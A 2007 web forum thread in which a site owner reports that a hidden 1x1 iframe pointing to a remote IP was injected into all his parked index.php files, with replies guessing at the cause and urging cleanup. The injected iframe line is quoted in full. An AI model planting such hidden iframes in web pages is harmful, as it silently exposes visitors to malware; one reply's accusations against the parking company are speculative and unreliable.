1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

iframe added to every index page

Discussion in 'Security' started by itssangy, Aug 21, 2007.

0
  1. #1
    Hello,

    I have about 70 parked pages on dreamhost server, and somehow all the index.php files were modified to include the following code:

    
<iframe src='http://81.95.149.74/22/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
    Code (markup):
    I dont think this was done manually as it would take a long time to do so, and all the files were modified on the same date at around the same time.

    Any idea?

    Thank you
     
    itssangy, Aug 21, 2007 IP
  2. admin@suckered.us

    admin@suckered.us Banned

    Messages:
    670
    Likes Received:
    22
    Best Answers:
    0
    Trophy Points:
    0
    #2
    Yeah someone either hacked your parking company and is raping your site's visitors to boost thier alexa ranking and they've likely a javascript or something installed on thier site ads that autoclicks them when a hit from your urls gets there, OR your parking company is stealing from thier advertisers this way. . You just can't see it all but it's likely happening. They're piggybacking your sites traffic to earn revenues on a page of thier own. Either that or they're piggybacking your site's traffic to resell it as a traffic service to others. Where do you have them parked? Seems the parking company is doing this. Very shady practice for a domain parking company. It might appear they're stealing from ad thier feed using this method by sending your traffic not only to your pages but others at the same time and possibly doing what's mentioned above.
     
    admin@suckered.us, Aug 21, 2007 IP
  3. clickbuild

    clickbuild Member

    Messages:
    89
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    48
    #3
    This is a common exploit - it usually comes in thru a guessed FTP account or an unpatched piece of open source.

    I would fix this ASAP as some of these jscript / iframe inserts can install a virus and are now getting blocked / banned by Google. In this case your might be a virus. Google the IP address to confirm.

    The best way to fix this is in the same way you got the problem, in an automated fashion.

    I wrote a basic script to check for file modification times and zoomed thru all the sites and then had another script to do the fixes.

    However you choose to do it - do it fast.

    --
    Steve
     
    clickbuild, Aug 22, 2007 IP
  4. admin@suckered.us

    admin@suckered.us Banned

    Messages:
    670
    Likes Received:
    22
    Best Answers:
    0
    Trophy Points:
    0
    #5
    Added you to msn to help repaid Tony.
     
    admin@suckered.us, Aug 30, 2007 IP
  5. fabriciogr

    fabriciogr Active Member

    Messages:
    958
    Likes Received:
    9
    Best Answers:
    0
    Trophy Points:
    73
    #6
    fabriciogr, Aug 30, 2007 IP
  6. itssangy

    itssangy Peon

    Messages:
    135
    Likes Received:
    6
    Best Answers:
    0
    Trophy Points:
    0
    #7
    Thanks guys
     
    itssangy, Aug 31, 2007 IP
  7. Obelia

    Obelia Notable Member

    Messages:
    2,083
    Likes Received:
    171
    Best Answers:
    0
    Trophy Points:
    210
    #8
    Obelia, Sep 2, 2007 IP
  8. cheapez

    cheapez Active Member

    Messages:
    1,123
    Likes Received:
    14
    Best Answers:
    0
    Trophy Points:
    78
    #9
    If you use iframe, Can Google see the contents in it?
     
    cheapez, Sep 2, 2007 IP